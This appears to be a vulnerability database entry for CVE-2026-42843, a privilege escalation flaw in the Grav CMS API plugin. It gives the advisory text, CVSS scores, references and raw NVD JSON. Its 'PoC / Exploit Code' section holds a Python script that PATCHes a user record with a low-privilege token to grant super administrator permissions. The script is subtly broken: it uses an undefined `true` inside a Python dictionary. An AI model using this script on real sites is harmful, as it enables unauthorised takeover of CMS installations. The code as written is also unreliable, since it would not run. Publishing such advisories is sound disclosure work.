CVE-2026-42843

Description

Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content, media, configuration, users, and system management. Prior to 1.0.0-beta.15, an insecure direct object reference and logic flaw in the Grav API plugin (UsersController::update) allows any authenticated user with basic API access (api.access) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (admin.super and api.super), leading to full system compromise and potential RCE. This vulnerability is fixed in 1.0.0-beta.15.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Grav API Plugin < 1.0.0-beta.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Grav API Plugin - Privilege Escalation (CVE-2026-42843)
# Description: Exploit IDOR to escalate user privileges to Super Admin

target_url = "http://target-site.com/api/users/self"
api_token = "LOW_PRIVILEGE_API_TOKEN"

headers = {
    "Authorization": f"Bearer {api_token}",
    "Content-Type": "application/json"
}

# Payload to grant super admin privileges
payload = {
    "permissions": {
        "admin": {
            "super": true,
            "login": true
        },
        "api": {
            "super": true
        }
    }
}

try:
    response = requests.patch(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully escalated privileges to Super Administrator.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42843
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42843
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42843/
[4] VulDB https://vuldb.com/cve/CVE-2026-42843
[5] https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736
[6] https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42843", "sourceIdentifier": "[email protected]", "published": "2026-05-11T17:16:34.013", "lastModified": "2026-05-11T20:25:42.893", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content, media, configuration, users, and system management. Prior to 1.0.0-beta.15, an insecure direct object reference and logic flaw in the Grav API plugin (UsersController::update) allows any authenticated user with basic API access (api.access) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (admin.super and api.super), leading to full system compromise and potential RCE. This vulnerability is fixed in 1.0.0-beta.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736", "source": "[email protected]"}, {"url": "https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}